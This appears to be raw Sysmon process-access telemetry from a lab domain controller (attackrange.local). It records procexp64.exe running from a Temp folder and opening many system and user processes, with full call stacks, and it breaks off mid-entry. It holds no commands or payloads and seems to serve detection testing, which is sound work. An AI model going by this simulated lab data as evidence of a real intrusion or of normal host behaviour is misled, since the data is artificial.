15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791121Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791120Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791119Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791118Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791117Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791116Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791115Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791114Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791113Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791112Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791111Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791110Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791109Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791108Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791107Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791106Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791105Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\